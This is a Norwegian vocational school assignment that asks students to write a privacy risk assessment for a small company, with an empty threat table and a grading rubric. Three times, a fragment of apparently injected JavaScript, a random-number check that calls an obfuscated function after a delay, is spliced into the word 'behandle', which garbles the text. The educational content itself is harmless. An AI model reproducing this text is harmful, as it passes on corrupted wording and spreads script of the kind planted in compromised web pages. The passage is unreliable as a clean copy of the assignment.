4.7.2 Risikovurdering personvern
Situasjonsbeskrivelse
Du er ansatt som IKT-servicemedarbeider i en mindre virksomhet med 10 ansatte.
IKT utstyret består i hovedsak av en laptop til hver ansatt, en felles server for lagring og administrative oppgaver, multifunksjonsskriver og en trådløs router for internett tilgang.
Bedriften lagrer, behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andler og oppbevarer persondata for andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andre bedrifter samt for egne ansatte.
Det har vært mange nyhetsoppslag i media den senere tid om dataangrep som truer personvernet i virksomheter.
Ledelsen i din bedrift er meget bekymret for at også denne virksomheten skal bli rammet.
Han ber deg derfor om å lage en risikovurdering der du analyserer potensielle trusler relatert til personvern. Slike trusler eller uønskede hendelser kan både komme utenfra bedriften og fra egne ansatte.
Oppdrag: Risikovurdering
Basert på situasjonsbeskrivelsen skal du lage en oversikt over mulige relevante hendelser som kan som kan oppstå. Deretter skal du vurdere konsekvens og sannsynlighet, kategori og i hvilken grad hendelsen kan aksepteres eller ikke. Oversikten skal inneholde tre hendelser/trusler med utfyllende beskrivelse.
Aktuelle kompetansemål:
– gi råd i henhold til gjeldende regelverk ved anskaffelse, bruk og utvikling av IKT-systemer
– behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andle fortrolige opplysninger på en etisk forsvarlig måte innenfor rammene av gjeldende regelverk
|
|
Hendelse |
Kategori K I T |
Konsekvens |
Sannsynlighet |
Vurdering |
|
1 |
|
|
|
|
|
|
2 |
|
|
|
|
|
|
3 |
|
|
|
|
|
Vurdering:
Eleven skal her registrere mulig relevante trusler / hendelser som kan inntreffe.
- Typen hendelser bør variere
- Konsekvens, sannsynlighet og vurdering bør være realistisk i forhold til case
- Sannsynligheten bør beskrives tydelig i forhold til case og egne forutsetninger
- K, I og T må kunne forklares
- Kjenne til hensikten med en risikovurdering
- Kjenne til hvordan man gjennomfører en risikovurdering i grove trekk
1 – 2: Eleven vise noe fagkunnskap men røper klare feil og mangler og bruker få faglige begreper.
Eleven er usikker i forhold til bruken av selve skjema. Eleven er usikker i beskrivelse av sannsynlighet og konsekvens.
3 – 4: Eleven viser gode fagkunnskaper, men ikke uten feil. Finner min 2 relevante hendelser, begrunner og forklarer.
Eleven er fortrolig med skjema og begreper – og har en viss vurdering av akseptansenivå og risiko.
5 – 6: Eleven viser solide fagkunnskaper med ubetydelige feil og mangler. Finner flere «gode» uønskede hendelser, begrunner og forklarer godt.
Eleven gjennomfører arbeidet sikkert og selvstendig. Er sikker i sin beskrivelse av sannsynlighet og konsekvens.
Viser at han/hun er fortrolig med skjema og begrep. God vurdering av akseptansenivå og risiko.